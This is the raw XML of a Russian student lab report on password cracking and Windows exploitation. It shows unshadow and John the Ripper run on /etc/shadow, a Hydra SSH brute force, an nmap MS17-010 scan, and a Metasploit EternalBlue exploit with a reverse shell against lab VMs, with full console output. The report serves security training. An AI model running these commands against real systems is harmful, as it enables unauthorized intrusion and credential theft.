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pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="EAECEF"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="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  <w:t>Отчет</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="EAECEF"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="0" w:name="user-content-задание"/>
      <w:bookmarkEnd w:id="0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  <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:ind w:left="707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Изучить вопрос безопасности паролей. Провести атаку на пароли с помощью John The Ripper+unshadow (оффлайн режим), Hydra (онлайн режим). В качестве инструкции можно использовать видеоматерилы или документ из доп материалов УрокMetasploitкоманды.docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:ind w:left="707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Установить Metasploit Framework(если не был установлен), настроить (как в методичке к уроке)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:ind w:left="707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Проверить систему на базе ОС Windows на уязвимости, которые могут привести к атакам WannaCRY и подобного вредоносного ПО. Если система уязвима, при помощи MSF продемонстрируйте возможные векторы атак с использованием данной уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="EAECEF"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="1" w:name="user-content-выполнение"/>
      <w:bookmarkEnd w:id="1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  <w:t>Выполнение:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="2" w:name="user-content-1-изучить-вопрос-безопаснос"/>
      <w:bookmarkEnd w:id="2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  <w:t>1. Изучить вопрос безопасности паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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bookmarkStart w:id="3" w:name="user-content-11-атака-на-пароли-с-помощь"/>
      <w:bookmarkEnd w:id="3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1.1 Атака на пароли с помощью John The Ripper+unshadow (оффлайн режим):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="4" w:name="user-content-команды"/>
      <w:bookmarkEnd w:id="4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  <w:t>Команды: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ind w:left="0" w:right="0" w:hanging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unshadow /etc/passwd /etc/shadow &gt; unshadow.txt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john unshadow.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="5" w:name="user-content-результат"/>
      <w:bookmarkEnd w:id="5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  <w:t>Результат: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ind w:left="0" w:right="0" w:hanging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kali:kali:1000:1000:,,,:/home/kali:/bin/bash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/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1 password hash cracked, 0 left</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="6" w:name="user-content-скриншот-консоли"/>
      <w:bookmarkEnd w:id="6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  <w:t>Скриншот консоли:</w:t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>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:color w:val="0366D6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366D6"/>
          <w:spacing w:val="0"/>
          <w:u w:val="none"/>
          <w:effect w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5819775" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Image1" descr="">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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>
                      <a:hlinkClick r:id="rId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widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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bookmarkStart w:id="7" w:name="user-content-12-атака-на-пароли-с-помощь"/>
      <w:bookmarkEnd w:id="7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1.2 Атака на пароли с помощью Hydra (онлайн режим):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="8" w:name="user-content-команды-1"/>
      <w:bookmarkEnd w:id="8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  <w:t>Команды:</w:t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Изучить вопрос безопасности паролей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="9" w:name="user-content-результат-1"/>
      <w:bookmarkEnd w:id="9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  <w:t>Результат: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ind w:left="0" w:right="0" w:hanging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Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.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/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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-27 15:14:19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[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4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[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task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[DATA] attacking ssh://192.168.1.172:22/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[22][ssh] host: 192.168.1.172   login: msfadmin   password: msfadmin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1 of 1 target successfully completed, 1 valid password found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Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-27 15:14:21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="10" w:name="user-content-скриншот-консоли-1"/>
      <w:bookmarkEnd w:id="10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  <w:t>Скриншот консоли:</w:t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>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:color w:val="0366D6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366D6"/>
          <w:spacing w:val="0"/>
          <w:u w:val="none"/>
          <w:effect w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5825490" cy="2629535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Image2" descr="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49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widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="11" w:name="user-content-2-установить-и-настроить-me"/>
      <w:bookmarkEnd w:id="11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  <w:t>2. Установить и настроить Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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bookmarkStart w:id="12" w:name="user-content-установка-metasploit-framew"/>
      <w:bookmarkEnd w:id="12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Установка Metasploit Framework не потребовалась.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="13" w:name="user-content-3-уязвимости-ос-windows"/>
      <w:bookmarkEnd w:id="13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  <w:t>3. Уязвимости ОС Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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bookmarkStart w:id="14" w:name="user-content-31-проверить-систему-на-баз"/>
      <w:bookmarkEnd w:id="14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3.1 Проверить систему на базе ОС Windows на уязвимости, которые могут привести к атакам WannaCRY и подобного вредоносного ПО:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="15" w:name="user-content-команды-2"/>
      <w:bookmarkEnd w:id="15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  <w:t>Команды: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ind w:left="0" w:right="0" w:hanging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nmap --script smb-vuln-ms17-010.nse 192.168.1.164</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="16" w:name="user-content-результат-2"/>
      <w:bookmarkEnd w:id="16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  <w:t>Результат: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ind w:left="0" w:right="0" w:hanging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Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 04:48 +08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Nmap scan report for 192.168.1.164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Host is up (0.00032s latency).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Not shown: 995 filtered ports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PORT     STATE SERVICE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135/tcp  open  msrpc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139/tcp  open  netbios-ssn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445/tcp  open  microsoft-ds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2869/tcp open  icslap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5357/tcp open  wsdapi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MAC Address: 00:0C:29:52:EA:B0 (VMware)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/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Host script results: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| smb-vuln-ms17-010: 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|   VULNERABLE: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|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)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|     State: VULNERABLE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|     IDs:  CVE:CVE-2017-0143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|     Risk factor: HIGH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|       A critical remote code execution vulnerability exists in Microsoft SMBv1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|        servers (ms17-010).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|           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|     Disclosure date: 2017-03-14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|     References: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|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143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|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/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|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx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/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Nmap done: 1 IP address (1 host up) scanned in 5.10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="17" w:name="user-content-скриншот-консоли-2"/>
      <w:bookmarkEnd w:id="17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  <w:t>Скриншот консоли:</w:t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>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:color w:val="0366D6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366D6"/>
          <w:spacing w:val="0"/>
          <w:u w:val="none"/>
          <w:effect w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6213475" cy="3733800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Image3" descr="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4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widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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bookmarkStart w:id="18" w:name="user-content-32--при-помощи-msf-продемон"/>
      <w:bookmarkEnd w:id="18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3.2 При помощи MSF продемонстрируйте возможные векторы атак:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="user-content-321-поиск-exploit"/>
      <w:bookmarkEnd w:id="19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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>3.2.1 Поиск exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="20" w:name="user-content-команды-3"/>
      <w:bookmarkEnd w:id="20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  <w:t>Команды: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ind w:left="0" w:right="0" w:hanging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search CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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</w:pPr>
      <w:bookmarkStart w:id="21" w:name="user-content-результат-3"/>
      <w:bookmarkEnd w:id="21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  <w:t>Результат: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ind w:left="0" w:right="0" w:hanging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Matching Modules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================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/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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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#  Name                                           Disclosure Date  Rank     Check  Description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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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-  ----                                           ---------------  ----     -----  -----------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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution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/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/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Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="user-content-321-выбор-exploit-для-испол"/>
      <w:bookmarkEnd w:id="22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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>3.2.1 Выбор exploit для использования</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="user-content-команды-4"/>
      <w:bookmarkEnd w:id="23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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>Команды: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ind w:left="0" w:right="0" w:hanging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use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="user-content-322-эксплуатация-уязвимости"/>
      <w:bookmarkEnd w:id="24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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>3.2.2 Эксплуатация уязвимости</w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="user-content-установка-адреса-атакуемого"/>
      <w:bookmarkEnd w:id="25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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>Установка адреса атакуемого узла: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ind w:left="0" w:right="0" w:hanging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set RHOSTS 192.168.1.164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set LHOSTS 192.168.1.139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set payload windows/x64/shell/reverse_tcp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exploit </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="300" w:before="36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/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="user-content-результат-4"/>
      <w:bookmarkEnd w:id="26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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>Результат: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ind w:left="0" w:right="0" w:hanging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[*] Started reverse TCP handler on 192.168.1.139:4444 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[*] 192.168.1.164:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check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[+] 192.168.1.164:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)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[*] 192.168.1.164:445     - Scanned 1 of 1 hosts (100% complete)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[*] 192.168.1.164:445 - Connecting to target for exploitation.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[+] 192.168.1.164:445 - Connection established for exploitation.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[+] 192.168.1.164:445 - Target OS selected valid for OS indicated by SMB reply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[*] 192.168.1.164:445 - CORE raw buffer dump (42 bytes)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[*] 192.168.1.164:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes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[*] 192.168.1.164:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv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[*] 192.168.1.164:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      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[+] 192.168.1.164:445 - Target arch selected valid for arch indicated by DCE/RPC reply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[*] 192.168.1.164:445 - Trying exploit with 12 Groom Allocations.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[*] 192.168.1.164:445 - Sending all but last fragment of exploit packet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[*] 192.168.1.164:445 - Starting non-paged pool grooming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[+] 192.168.1.164:445 - Sending SMBv2 buffers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[+] 192.168.1.164:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.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[*] 192.168.1.164:445 - Sending final SMBv2 buffers.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[*] 192.168.1.164:445 - Sending last fragment of exploit packet!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[*] 192.168.1.164:445 - Receiving response from exploit packet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[+] 192.168.1.164:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!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[*] 192.168.1.164:445 - Sending egg to corrupted connection.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[*] 192.168.1.164:445 - Triggering free of corrupted buffer.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[*] Sending stage (336 bytes) to 192.168.1.164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[*] Command shell session 2 opened (192.168.1.139:4444 -&gt; 192.168.1.164:49707) at 2020-09-29 05:13:39 +0800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[+] 192.168.1.164:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=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[+] 192.168.1.164:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=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[+] 192.168.1.164:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=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/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Microsoft Windows [Version 6.1.7601]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(c) ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:cs="SFMono-Regular;Consolas;Liberation Mono;Menlo;monospace"/>
          <w:bCs w:val="false"/>
          <w:iCs w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">௮����� ���������� </w:t>
      </w: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(Microsoft Corp.), 2009. ��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia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饭�</w:t>
      </w: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.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/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C:\Windows\system32&gt;dir \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dir \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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>��� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:cs="SFMono-Regular;Consolas;Liberation Mono;Menlo;monospace"/>
          <w:bCs w:val="false"/>
          <w:iCs w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ன�</w:t>
      </w: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⢥ C �� ����� ��⪨.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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:cs="SFMono-Regular;Consolas;Liberation Mono;Menlo;monospace"/>
          <w:bCs w:val="false"/>
          <w:iCs w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>਩��� ����� ⮬�</w:t>
      </w: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: 8E70-A940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/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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:cs="SFMono-Regular;Consolas;Liberation Mono;Menlo;monospace"/>
          <w:bCs w:val="false"/>
          <w:iCs w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ন��� ����� </w:t>
      </w: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C:\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/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14.07.2009  12:20    &lt;DIR&gt;          PerfLogs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07.02.2017  21:33    &lt;DIR&gt;          Program Files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07.02.2017  21:37    &lt;DIR&gt;          Program Files (x86)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28.09.2020  20:55    &lt;DIR&gt;          Users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28.09.2020  20:56    &lt;DIR&gt;          Windows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30.01.2017  17:50    &lt;DIR&gt;          ��⨢����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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w: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0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia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䠩���              </w:t>
      </w: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0 ����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24292E"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w: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6 �����  51�356�168�192 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:cs="SFMono-Regular;Consolas;Liberation Mono;Menlo;monospace"/>
          <w:bCs w:val="false"/>
          <w:iCs w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>᢮�����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C:\Windows\system32&gt;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Скриншот консоли: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caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:color w:val="0366D6"/>
          <w:spacing w:val="0"/>
          <w:u w:val="none"/>
          <w:effect w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5353050" cy="5962015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Image4" descr="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96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  <w:font w:name="SFMono-Regular">
    <w:altName w:val="Consola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4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oto Serif CJK SC" w:cs="Lohit Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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Alex13thGB/InfoSecurity/blob/master/Lesson5/unshadow.pn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github.com/Alex13thGB/InfoSecurity/blob/master/Lesson5/hydra.pn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github.com/Alex13thGB/InfoSecurity/blob/master/Lesson5/nmap.pn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github.com/Alex13thGB/InfoSecurity/blob/master/Lesson5/msf.png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LibreOffice/6.4.5.2$Linux_X86_64 LibreOffice_project/a726b36747cf2001e06b58ad5db1aa3a9a1872d6</Application>
  <Pages>7</Pages>
  <Words>880</Words>
  <Characters>6075</Characters>
  <CharactersWithSpaces>7311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2020-09-28T21:31:37Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>ru-RU</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-28T21:34:46Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>